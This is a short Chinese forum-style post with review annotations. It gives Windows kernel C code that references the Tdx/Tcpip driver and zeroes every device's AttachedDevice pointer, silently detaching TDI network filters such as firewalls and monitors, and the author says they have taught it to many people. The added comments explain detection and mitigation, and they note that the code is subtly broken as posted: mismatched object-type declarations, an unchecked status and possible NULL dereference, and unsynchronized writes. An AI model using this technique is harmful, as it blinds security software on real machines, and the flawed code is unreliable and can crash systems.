清除tdi的方法
// Hand-written declarations for two kernel symbols used by the snippet below.
// They are declared here rather than taken from a header; presumably NTDDK.h
// does not provide them -- confirm against the WDK version in use.
// The extern "C" guard keeps the names unmangled when this is built as C++.
#ifdef __cplusplus
extern "C"
{
#endif
#include <NTDDK.h>
// Looks up a named object in the object manager namespace and, on success,
// returns a referenced pointer through Object. The caller must release that
// reference (the snippet below does so with ObDereferenceObject).
// Returns NTSTATUS; callers should test it before touching *Object.
NTKERNELAPI
NTSTATUS
ObReferenceObjectByName(
IN PUNICODE_STRING ObjectName,
IN ULONG Attributes,
IN PACCESS_STATE PassedAccessState OPTIONAL,
IN ACCESS_MASK DesiredAccess OPTIONAL,
IN POBJECT_TYPE ObjectType,
IN KPROCESSOR_MODE AccessMode,
IN OUT PVOID ParseContext OPTIONAL,
OUT PVOID *Object
);
// Note the extra level of indirection: this is a pointer to a POBJECT_TYPE,
// whereas the ObjectType parameter above takes a POBJECT_TYPE.
extern POBJECT_TYPE* IoDriverObjectType;
#ifdef __cplusplus
}
#endif
// Purpose: reference the driver object named below, walk its list of device
// objects, and zero each device's AttachedDevice field. Per the page title the
// intent is to drop whatever TDI filter devices are attached on top of them.
//
// NOTE(review): in this listing the statements sit at file scope; presumably
// they belong inside a driver routine running in kernel mode -- confirm.
//
// Defender's view: a network filter that relies on being attached to these
// devices would stop seeing I/O after this runs, while the filter itself is
// not notified. A filter can detect this by checking that its own device is
// still reachable through the target's AttachedDevice chain. Running this
// needs kernel code execution, so driver-load controls are the main mitigation.
PDEVICE_OBJECT DeviceObject = NULL;
PFILE_OBJECT FileObject = NULL; // never used in this snippet
PDRIVER_OBJECT pDriver = NULL;
UNICODE_STRING DeviceName;
RtlInitUnicodeString( &DeviceName, L"\\Driver\\Tdx" );// on Windows 7
//RtlInitUnicodeString( &DeviceName, L"\\Driver\\Tcpip" );// on XP
// NOTE(review): the NTSTATUS result is discarded, so a failed lookup is not
// detected. Also, IoDeviceObjectType is not declared anywhere in this listing;
// the extern above names IoDriverObjectType (a POBJECT_TYPE*), and the object
// being opened is under \Driver. As posted, this call does not match the
// declarations shown.
ObReferenceObjectByName(&DeviceName,OBJ_CASE_INSENSITIVE,NULL,FILE_ALL_ACCESS,IoDeviceObjectType,KernelMode,NULL,(PVOID*)&pDriver);
// NOTE(review): pDriver is dereferenced without a NULL check. If the lookup
// failed it is presumably still NULL (its initial value), and a NULL
// dereference in kernel mode crashes the system.
DeviceObject = pDriver->DeviceObject;
// Walk every device object owned by the driver via NextDevice.
while(DeviceObject!= NULL )
{
// Overwrites the attachment pointer directly. No lock or other
// synchronization is visible here, so this can race with I/O in flight and
// with the attached driver's own bookkeeping -- a stability risk.
DeviceObject->AttachedDevice=0;
DeviceObject = DeviceObject->NextDevice;
}
// Release the reference taken by ObReferenceObjectByName.
ObDereferenceObject(pDriver);
虽说简单,但是已经教过很多人了,就像用TDI过滤驱动修改数据包一样简单。